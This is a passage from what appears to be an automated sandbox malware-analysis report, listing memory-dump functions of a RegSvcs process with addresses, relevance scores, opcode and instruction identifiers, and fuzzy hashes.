                                                                                                          • Instruction ID: c9466248adaf209c107539a9e04560f189d86037e7414181bd670a99347a1327
                                                                                                          • Opcode Fuzzy Hash: 8b65249ace9156929d1db9b5cda11aab8b23970ec3c50393f35b9220dd1722eb
                                                                                                          • Instruction Fuzzy Hash: A321A375F0061A9FDB50DFB9E880AAEBBF5EB48710F118025E505E7340D738DC418BA5
                                                                                                          Function 06D23B20 Relevance: .1, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f08150ef2d85529f2a7a1b9116151e7fbb13693f35d9f8051fb98a5f7a1fb8d6
                                                                                                          • Instruction ID: eecdbb92d10015e5df5d9cfda3198702d458fca750df37aaf9ee2287d658f083
                                                                                                          • Opcode Fuzzy Hash: f08150ef2d85529f2a7a1b9116151e7fbb13693f35d9f8051fb98a5f7a1fb8d6
                                                                                                          • Instruction Fuzzy Hash: 5C219D75F0062A9FDB50DFB9D880AAEBBF5EB48724F108029E905E7340E739DD418B95
                                                                                                          Function 0168D20C Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb38ca355b614ab5a002be7f92846dc91a5cad61b14c0fba6fab2b4c37163250
                                                                                                          • Instruction ID: a53a889eb15f2f40308297bdae32da4f84cb759038bc2efd4707e393af6a05d9
                                                                                                          • Opcode Fuzzy Hash: cb38ca355b614ab5a002be7f92846dc91a5cad61b14c0fba6fab2b4c37163250
                                                                                                          • Instruction Fuzzy Hash: D4212371504244DFDB01EF98D9D4B2ABBA5FB84334F20C769EA494B386C37AD446CA71
                                                                                                          Function 0168D3BC Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 38bece13ad41ebf2443fe205c3eef95b6974d55ef8dcd9122eb0b9f11b812186
                                                                                                          • Instruction ID: ff2dcbaf82a67b7acffd56bbec518d38a8a93bde4255d14fee2205b65c4ebc50
                                                                                                          • Opcode Fuzzy Hash: 38bece13ad41ebf2443fe205c3eef95b6974d55ef8dcd9122eb0b9f11b812186
                                                                                                          • Instruction Fuzzy Hash: C7210471504204EFDB05EF58D9C4B26BBA5FB84314F20C66DE90A4B396C376E846CA71
                                                                                                          Function 0168D044 Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f5145b69298c0b894cc4a9991e280ee55ba28f18b14a287613a2b566f92fcf1a
                                                                                                          • Instruction ID: 1f99aad3df31d2aec1c41fcb5410a7c2010f06151e1364d8bb7f70a21af2d46d
                                                                                                          • Opcode Fuzzy Hash: f5145b69298c0b894cc4a9991e280ee55ba28f18b14a287613a2b566f92fcf1a
                                                                                                          • Instruction Fuzzy Hash: 4221D071504204EFDB15EF68C984B26BBA5EB84314F20C669E9494B392C77AD447CA71
                                                                                                          Function 06D26D9B Relevance: .1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21e12a7acbddfc9a59508b69eaf563443bae131a7a215ee123815fc92f200bef
                                                                                                          • Instruction ID: 30176d725a09ebb43f30fadea8a8feded2909bf64c9652797a717f1c16ccb9da
                                                                                                          • Opcode Fuzzy Hash: 21e12a7acbddfc9a59508b69eaf563443bae131a7a215ee123815fc92f200bef
                                                                                                          • Instruction Fuzzy Hash: F8219030F1022A9FDF94CB69E9546AEB7F6EBC4314F148529E809E7340DB35DD528B84
                                                                                                          Function 06D2F209 Relevance: .1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a268b4cefa2be6c8f17ee51475d4e559a50b79b6a1b127a2514a3468b2e60be8
                                                                                                          • Instruction ID: 7fd6430a22b9dd42a3809d4a37a21f1bda7fbd2efdb66086ca7a9f035d62b766
                                                                                                          • Opcode Fuzzy Hash: a268b4cefa2be6c8f17ee51475d4e559a50b79b6a1b127a2514a3468b2e60be8
                                                                                                          • Instruction Fuzzy Hash: CE01B134B041622FDB658BBCA854B6E67EADBCA618F10483EF10AC7340DD15CC0243E5
                                                                                                          Function 06D23C30 Relevance: .1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba98aeafa6128f56dc5f9d06458920a7e969016800b1e24b7151d771c303c8f2
                                                                                                          • Instruction ID: 052265432252f4d0809876743cdfa91ff75ec5fc1cb5a1164b9930783a84bfc6
                                                                                                          • Opcode Fuzzy Hash: ba98aeafa6128f56dc5f9d06458920a7e969016800b1e24b7151d771c303c8f2
                                                                                                          • Instruction Fuzzy Hash: 5111A132B141395FDB449A68D814AAF73FAEBC8715F014039D50AE7340EE39DC028B91
                                                                                                          Function 06D230C7 Relevance: .1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 18ba6b8e7877c7078c19f5b64d9b3ebb59ed4a4a98a78ae59fec2ff9621c878d
                                                                                                          • Instruction ID: 248c5d8091a61906282190fb6178cac07ee0c4ce3372e933eaf8c280543bb092
                                                                                                          • Opcode Fuzzy Hash: 18ba6b8e7877c7078c19f5b64d9b3ebb59ed4a4a98a78ae59fec2ff9621c878d
                                                                                                          • Instruction Fuzzy Hash: 5811C235E012299ACB68CB74CC455DEF7B5EB88304F01456AD40AE7200DA34D981CBA1
                                                                                                          Function 06D238E8 Relevance: .1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49fdea423bd2819515bba6e435a5a8d2870b15376ffa893c226ffe2d64eaeaa5
                                                                                                          • Instruction ID: 0a8e0326471496788fe8faa71bdb572858502ff5b26d2fb73a57d6cddc81853b
                                                                                                          • Opcode Fuzzy Hash: 49fdea423bd2819515bba6e435a5a8d2870b15376ffa893c226ffe2d64eaeaa5
                                                                                                          • Instruction Fuzzy Hash: 2E21F2B1D01219AFCB00DF9AD884ACEFFB4FB49324F10812AE918A7200C374A954CFA5
                                                                                                          Function 06D24279 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 193fb80afcc433b7fb42cf58a6fb214b09ad58f10796cece5b6b6be94881774e
                                                                                                          • Instruction ID: 0e20cc660585da5b833855a54ca69ae1feeada13b2b08bd472da75eb435afe0a
                                                                                                          • Opcode Fuzzy Hash: 193fb80afcc433b7fb42cf58a6fb214b09ad58f10796cece5b6b6be94881774e
                                                                                                          • Instruction Fuzzy Hash: 1F01A231B004225BDB6096BEE844B6FA2CAEFC9724F208439E50EC7344DE65CC4243D5
                                                                                                          Function 0168D03F Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 692eece4553a09b390069f09f8cc7db3a17f7a2b1c4d4c2363b580c59ecc7723
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: A711DD75504284CFDB12DF54C9C4B16BFA2FB84314F24C6AAD8494B392C33AD44ACF62
                                                                                                          Function 0168D207 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                          • Instruction ID: 3e919ce22f09712cd4d66f6b08a5d3e8c8dcb737969c12d4da50c76a6042a306
                                                                                                          • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                          • Instruction Fuzzy Hash: C211DD76504284CFDB02DF58D9C4B16BF61FB84324F24C6AAD9494B786C33AD40ACBA2
                                                                                                          Function 0168D3B7 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155806417.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_168d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 2155be1c8fb5d0338bfebf24dcab099ac715fc530d5aedea85acf728520bb7ea
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: BA11DD75504280DFDB02DF58D9C4B55BFB2FB84314F24C6AAD8494B396C33AE40ACBA1
                                                                                                          Function 06D238F0 Relevance: .1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4417870d9ab754eb2ad439c9193ce043c89b70f6f05013a7347b50c575e380ed
                                                                                                          • Instruction ID: 6ca803856bd057f699944332a64fa30cda9726b13c94c74f0b9b9b61d574a0bf
                                                                                                          • Opcode Fuzzy Hash: 4417870d9ab754eb2ad439c9193ce043c89b70f6f05013a7347b50c575e380ed
                                                                                                          • Instruction Fuzzy Hash: 7B11CFB1D01219AFDB00DF9AD884ACEFBB4FB49324F10812AE918A7240C374A954CFA5
                                                                                                          Function 06D24280 Relevance: .1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 05c554731d0c3c5944b6efd53d94ddc8266f3556ba9a7cb5cff7a7c590569b32
                                                                                                          • Instruction ID: 636538eb920138a83bc6767f047d4ee098bde33092a06925d8e34f24d1d5d278
                                                                                                          • Opcode Fuzzy Hash: 05c554731d0c3c5944b6efd53d94ddc8266f3556ba9a7cb5cff7a7c590569b32
                                                                                                          • Instruction Fuzzy Hash: FF01DC31B004225BDBA09ABEE404B2FB2CAEFC9724F208439E50ECB344EE65DC4243D5
                                                                                                          Function 06D2F218 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba0bd6e6699c81c290db24b25b8c82049e7655966c7b0e6490523b1254239f5c
                                                                                                          • Instruction ID: bc789e87c4889734082bc865561bcfca4d022943261428c7b58f9347b606d79b
                                                                                                          • Opcode Fuzzy Hash: ba0bd6e6699c81c290db24b25b8c82049e7655966c7b0e6490523b1254239f5c
                                                                                                          • Instruction Fuzzy Hash: 23018C75B040221BDB659BADA454B2E63EAEBCA618F108839E20EC7340EE65DC0247D9
                                                                                                          Function 06D2A38D Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b162133e1ff10ecf8540e4ca095727b99fb6faa2b2ed40765ecdf4efc539115a
                                                                                                          • Instruction ID: 87b2356926ce01730b53d8394eefe324a4b2c55aa4ee77dc4202f66c8d1fa69b
                                                                                                          • Opcode Fuzzy Hash: b162133e1ff10ecf8540e4ca095727b99fb6faa2b2ed40765ecdf4efc539115a
                                                                                                          • Instruction Fuzzy Hash: B4018130B001225BCB609AACE854B6A73DAFBC9718F144838E10EC7340DE25EC4283E5
                                                                                                          Function 06D23C2D Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 885ef3ccd325006a773561cf236fa2bd7d771c3b86b0eada52deaadc6517fb2d
                                                                                                          • Instruction ID: 326d9324f37294c6662aeb28b66a268bfc0090f854c82ca5d819ed8ab9b8d190
                                                                                                          • Opcode Fuzzy Hash: 885ef3ccd325006a773561cf236fa2bd7d771c3b86b0eada52deaadc6517fb2d
                                                                                                          • Instruction Fuzzy Hash: BB018632B141355BEB589668DC14AFF73AEDBC8B15F01403AD50AD7280EE68DC0247E2
                                                                                                          Function 06D2A390 Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d1251568b0d52958165b8f6e4afec715af5ecdabe7f060863bf580618d9cd4c2
                                                                                                          • Instruction ID: 72a1330af7c2bbaa332b06eb8be5efc9344b5dfea25f8cfc447651c07d78d51d
                                                                                                          • Opcode Fuzzy Hash: d1251568b0d52958165b8f6e4afec715af5ecdabe7f060863bf580618d9cd4c2
                                                                                                          • Instruction Fuzzy Hash: 42013130B101225BDB659AACE454B2A73DAFBC9759F144839E10EC7344DE25EC428795
                                                                                                          Function 0167D8C5 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155744592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_167d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfda7e3df6e90e2c64df8f68d9ae61fec99b3ad6aba5879f9e872c78bde2a8d6
                                                                                                          • Instruction ID: 7d200319c6334ab39cd99d7ce55f019d69d1619bb1d76471dff53e3968952f85
                                                                                                          • Opcode Fuzzy Hash: cfda7e3df6e90e2c64df8f68d9ae61fec99b3ad6aba5879f9e872c78bde2a8d6
                                                                                                          • Instruction Fuzzy Hash: 8A01D631008344AAF7118A6EDD84B67BFECEF45324F18CC2AED4D4A286C779D841CAB1
                                                                                                          Function 06D23C27 Relevance: .0, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e8d04b71477603a2e1f312d9346383a098690ed43cffdcf10717e7c0967f2e6d
                                                                                                          • Instruction ID: be47267f2d8f28e914fe5f0763b7e6beac7130925e5b5443dfb8de96351eb848
                                                                                                          • Opcode Fuzzy Hash: e8d04b71477603a2e1f312d9346383a098690ed43cffdcf10717e7c0967f2e6d
                                                                                                          • Instruction Fuzzy Hash: CEF06832B140365BEB889674EC507BF63EBDBD8A15F05403AD50AD3250EF29DC129795
                                                                                                          Function 06D2C843 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3381336abbf85bcf6bb539c1989c6461f1abd978af286c1d70e37317b8929c30
                                                                                                          • Instruction ID: 96ca3f2c05b40a0bd256a8309bbce3d38ca49773731f3d560d0b43989fbf11cd
                                                                                                          • Opcode Fuzzy Hash: 3381336abbf85bcf6bb539c1989c6461f1abd978af286c1d70e37317b8929c30
                                                                                                          • Instruction Fuzzy Hash: 6BF0BE32F312359BCBA49A68EC049EEB736EB84254F008529E801E7280D6329D058BC0
                                                                                                          Function 0167D8C4 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4155744592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_167d000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e08c8abd66433c96c2d4759c20772cf9e7d3cdddc7ab4d1a93a21556d11ce701
                                                                                                          • Instruction ID: 6a7a100b19526154850056f2211a15d8fc15867e72275259b8935bc390f71c65
                                                                                                          • Opcode Fuzzy Hash: e08c8abd66433c96c2d4759c20772cf9e7d3cdddc7ab4d1a93a21556d11ce701
                                                                                                          • Instruction Fuzzy Hash: 11F06271404344AAE7118E1ADD84B66FFE8EF45634F18C85AED484A286C379A845CAB1
                                                                                                          Function 06D264FD Relevance: .0, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49e5b8df24c716313b59342816051bd4b1caa3032c340481585f58d7b3215510
                                                                                                          • Instruction ID: 3939984a0f58ababf0f005dd41a79fa185fe43230ef8f1072727932bea78d2b3
                                                                                                          • Opcode Fuzzy Hash: 49e5b8df24c716313b59342816051bd4b1caa3032c340481585f58d7b3215510
                                                                                                          • Instruction Fuzzy Hash: 76E08C70E1025AABDF60CFB0C98676E77ADDB45208F2088A8E409C7206E577DE014790
                                                                                                          Function 06D264F1 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 05221cb0d890b020a7d9d7d586a5f9f86a854a5923875ea39a3b2ab06dd34f87
                                                                                                          • Instruction ID: 85f776a20584a42cfbf363c2f8dd83e7211a47d5643a9e215f388b6c75be3423
                                                                                                          • Opcode Fuzzy Hash: 05221cb0d890b020a7d9d7d586a5f9f86a854a5923875ea39a3b2ab06dd34f87
                                                                                                          • Instruction Fuzzy Hash: 82B012E385A3EA0FE7865AA03C2483A3F0BD7E620CB810BC27849C7056E50BDC2441B3

                                                                                                          Non-executed Functions

                                                                                                          Function 06D27720 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2222239885
                                                                                                          • Opcode ID: fa878d35d3e288f783140cc6b569c615074757beb331f78951eb43292bcb56dd
                                                                                                          • Instruction ID: 736c2f4747fbcfd9ff7230c34e0a0e77047388a19ad9b0439a5d75c9cc7447eb
                                                                                                          • Opcode Fuzzy Hash: fa878d35d3e288f783140cc6b569c615074757beb331f78951eb43292bcb56dd
                                                                                                          • Instruction Fuzzy Hash: 5B121A30E0022ACFDB68DF75C854AAEB7F6BF98704F208569D409AB354DB309D85CB91
                                                                                                          Function 06D2A9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-3823777903
                                                                                                          • Opcode ID: 4cac40d7163f35d941c8d051b6885e87fb7d0088bcb581e63081c97b18e49fd7
                                                                                                          • Instruction ID: 10bb14e8a9e84fb4ce13b0b4fd566c411f0e2dbdf3fdcb32ed4a2c68355474eb
                                                                                                          • Opcode Fuzzy Hash: 4cac40d7163f35d941c8d051b6885e87fb7d0088bcb581e63081c97b18e49fd7
                                                                                                          • Instruction Fuzzy Hash: 8A918C30E0021A9FEB68DF69D954B6EBBF6FF94708F188529E4019B254DB34DC85CB90
                                                                                                          Function 06D27120 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-390881366
                                                                                                          • Opcode ID: 883500efa6faffca23aaa7e7044dfafefd9bf347fc62a43de9176979a4765bf6
                                                                                                          • Instruction ID: 0e8a9b18c83c2d6e2ee65d0b0abb9e14feeb6df1444040d14c8047ba8f54379f
                                                                                                          • Opcode Fuzzy Hash: 883500efa6faffca23aaa7e7044dfafefd9bf347fc62a43de9176979a4765bf6
                                                                                                          • Instruction Fuzzy Hash: 1CF13C30B0121ACFDB54DBA8D994A6EB7B6FF98305F208568D4059B358CB35DC86CB91
                                                                                                          Function 06D2BA70 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
